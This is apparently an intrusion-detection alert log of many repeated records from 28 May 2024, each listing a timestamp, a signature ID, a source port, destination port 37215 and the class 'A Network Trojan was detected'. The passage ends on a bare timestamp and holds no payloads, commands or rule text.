            Timestamp:05/28/24-09:57:18.870378
            SID:2829579
            Source Port:44508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811378
            SID:2829579
            Source Port:51286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999371
            SID:2829579
            Source Port:45230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067230
            SID:2829579
            Source Port:39544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587334
            SID:2829579
            Source Port:39536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069751
            SID:2835222
            Source Port:59898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.557740
            SID:2829579
            Source Port:38592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048229
            SID:2835222
            Source Port:36958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034182
            SID:2829579
            Source Port:36670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506863
            SID:2829579
            Source Port:49684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755097
            SID:2835222
            Source Port:51766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064499
            SID:2829579
            Source Port:39918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079181
            SID:2829579
            Source Port:47142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771781
            SID:2829579
            Source Port:36402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000329
            SID:2835222
            Source Port:43312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.664050
            SID:2829579
            Source Port:40552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856342
            SID:2829579
            Source Port:41228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564885
            SID:2829579
            Source Port:34184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333186
            SID:2835222
            Source Port:42040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423160
            SID:2835222
            Source Port:38320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034182
            SID:2829579
            Source Port:46354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824629
            SID:2829579
            Source Port:36258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341706
            SID:2829579
            Source Port:33626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881089
            SID:2835222
            Source Port:34510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919805
            SID:2835222
            Source Port:43212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863665
            SID:2829579
            Source Port:46602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873154
            SID:2829579
            Source Port:60936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779700
            SID:2829579
            Source Port:41466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000807
            SID:2835222
            Source Port:43020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868156
            SID:2829579
            Source Port:35272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552640
            SID:2829579
            Source Port:45896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559286
            SID:2835222
            Source Port:57130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807429
            SID:2829579
            Source Port:56654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047891
            SID:2829579
            Source Port:55750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505738
            SID:2835222
            Source Port:58474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378164
            SID:2835222
            Source Port:34394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723879
            SID:2829579
            Source Port:55676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.726477
            SID:2829579
            Source Port:59518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275070
            SID:2829579
            Source Port:47742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927343
            SID:2829579
            Source Port:58820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748413
            SID:2829579
            Source Port:44618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279493
            SID:2835222
            Source Port:57202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716548
            SID:2835222
            Source Port:45956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811373
            SID:2835222
            Source Port:50868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.485669
            SID:2829579
            Source Port:52810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804981
            SID:2835222
            Source Port:56540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776862
            SID:2835222
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.844756
            SID:2829579
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.751334
            SID:2829579
            Source Port:55100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.937772
            SID:2829579
            Source Port:53242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.814494
            SID:2835222
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.017119
            SID:2829579
            Source Port:55452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812224
            SID:2829579
            Source Port:41822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814410
            SID:2829579
            Source Port:56914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706600
            SID:2829579
            Source Port:37502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843189
            SID:2829579
            Source Port:35014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714986
            SID:2829579
            Source Port:35118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582246
            SID:2835222
            Source Port:33618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.025845
            SID:2835222
            Source Port:35232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.582062
            SID:2829579
            Source Port:37528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753813
            SID:2829579
            Source Port:38694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231160
            SID:2829579
            Source Port:45502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676425
            SID:2835222
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869605
            SID:2835222
            Source Port:35630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790556
            SID:2829579
            Source Port:51732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295001
            SID:2835222
            Source Port:51372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919728
            SID:2829579
            Source Port:56558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956744
            SID:2835222
            Source Port:60300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998602
            SID:2835222
            Source Port:58662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398157
            SID:2835222
            Source Port:33560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770702
            SID:2835222
            Source Port:40652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000172
            SID:2835222
            Source Port:58568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057729
            SID:2829579
            Source Port:44802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635029
            SID:2835222
            Source Port:49302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060133
            SID:2835222
            Source Port:56356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605213
            SID:2835222
            Source Port:48128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687390
            SID:2835222
            Source Port:51656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047288
            SID:2835222
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086649
            SID:2835222
            Source Port:53668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919554
            SID:2829579
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754662
            SID:2835222
            Source Port:34668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945184
            SID:2829579
            Source Port:57282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929908
            SID:2829579
            Source Port:51820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.634624
            SID:2835222
            Source Port:43956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900969
            SID:2835222
            Source Port:39760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379882
            SID:2829579
            Source Port:46692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.587997
            SID:2829579
            Source Port:33342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696610
            SID:2829579
            Source Port:58244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475590
            SID:2829579
            Source Port:36322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775644
            SID:2835222
            Source Port:56512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687499
            SID:2835222
            Source Port:36678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810769
            SID:2829579
            Source Port:49470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307713
            SID:2835222
            Source Port:36800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483002
            SID:2829579
            Source Port:56714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755115
            SID:2835222
            Source Port:49316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967593
            SID:2835222
            Source Port:60002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065528
            SID:2829579
            Source Port:38556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756597
            SID:2829579
            Source Port:56080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951236
            SID:2835222
            Source Port:52890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925289
            SID:2835222
            Source Port:46552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047877
            SID:2829579
            Source Port:37042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675237
            SID:2829579
            Source Port:39332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573033
            SID:2829579
            Source Port:45116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.108191
            SID:2829579
            Source Port:38258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887890
            SID:2835222
            Source Port:53994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400080
            SID:2829579
            Source Port:60850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772222
            SID:2835222
            Source Port:58966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864740
            SID:2835222
            Source Port:54076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057900
            SID:2835222
            Source Port:60002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823597
            SID:2835222
            Source Port:42790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321144
            SID:2829579
            Source Port:39652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444880
            SID:2829579
            Source Port:56588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.843630
            SID:2835222
            Source Port:54730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925107
            SID:2835222
            Source Port:44390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064917
            SID:2829579
            Source Port:37574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505753
            SID:2829579
            Source Port:49964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704326
            SID:2835222
            Source Port:36002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777870
            SID:2835222
            Source Port:35648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.806004
            SID:2835222
            Source Port:36026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.777728
            SID:2829579
            Source Port:48550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968041
            SID:2835222
            Source Port:59988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333127
            SID:2829579
            Source Port:38040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649764
            SID:2829579
            Source Port:49694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446899
            SID:2829579
            Source Port:33604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412792
            SID:2829579
            Source Port:42632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870334
            SID:2829579
            Source Port:54342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541682
            SID:2835222
            Source Port:49440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881072
            SID:2835222
            Source Port:41214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883514
            SID:2829579
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.566035
            SID:2829579
            Source Port:41040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862258
            SID:2835222
            Source Port:49280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995949
            SID:2829579
            Source Port:50188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870062
            SID:2835222
            Source Port:53490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914976
            SID:2829579
            Source Port:57682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935928
            SID:2829579
            Source Port:33950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334919
            SID:2829579
            Source Port:42468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756559
            SID:2829579
            Source Port:56368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994041
            SID:2835222
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895390
            SID:2829579
            Source Port:40554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711119
            SID:2829579
            Source Port:52984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486986
            SID:2835222
            Source Port:57588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850949
            SID:2835222
            Source Port:42194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.488002
            SID:2835222
            Source Port:43836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967022
            SID:2835222
            Source Port:53554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730606
            SID:2829579
            Source Port:58196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382623
            SID:2829579
            Source Port:33960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743088
            SID:2829579
            Source Port:53574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870727
            SID:2829579
            Source Port:48056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555116
            SID:2835222
            Source Port:48272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.545031
            SID:2835222
            Source Port:55074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038322
            SID:2835222
            Source Port:58350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990527
            SID:2829579
            Source Port:37738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967681
            SID:2835222
            Source Port:60976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944202
            SID:2829579
            Source Port:47916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871464
            SID:2829579
            Source Port:41086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048028
            SID:2829579
            Source Port:34300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764592
            SID:2829579
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876150
            SID:2829579
            Source Port:45830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368337
            SID:2835222
            Source Port:57776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887583
            SID:2835222
            Source Port:60536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.375902
            SID:2829579
            Source Port:36974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374024
            SID:2829579
            Source Port:55290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506973
            SID:2835222
            Source Port:43766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348836
            SID:2829579
            Source Port:39486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723469
            SID:2835222
            Source Port:44064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.063799
            SID:2835222
            Source Port:34580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831769
            SID:2835222
            Source Port:33124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.363776
            SID:2829579
            Source Port:57364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311146
            SID:2835222
            Source Port:44330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552528
            SID:2829579
            Source Port:45376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767336
            SID:2835222
            Source Port:37228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645672
            SID:2835222
            Source Port:37014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508133
            SID:2829579
            Source Port:59666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544360
            SID:2835222
            Source Port:55416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.731162
            SID:2829579
            Source Port:43864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050816
            SID:2835222
            Source Port:53038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737337
            SID:2835222
            Source Port:50676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.721451
            SID:2835222
            Source Port:38840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817471
            SID:2835222
            Source Port:48456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.580149
            SID:2835222
            Source Port:36500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507738
            SID:2829579
            Source Port:50706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774646
            SID:2829579
            Source Port:54326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833783
            SID:2835222
            Source Port:54338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047646
            SID:2835222
            Source Port:36480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507800
            SID:2835222
            Source Port:36542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871140
            SID:2829579
            Source Port:51300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058156
            SID:2835222
            Source Port:55884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773584
            SID:2829579
            Source Port:36352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739101
            SID:2829579
            Source Port:54520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782570
            SID:2829579
            Source Port:56242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584886
            SID:2835222
            Source Port:38978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424185
            SID:2835222
            Source Port:52414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.553062
            SID:2835222
            Source Port:47508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733086
            SID:2829579
            Source Port:41324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423984
            SID:2835222
            Source Port:50358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869578
            SID:2835222
            Source Port:38348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818285
            SID:2829579
            Source Port:36106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853835
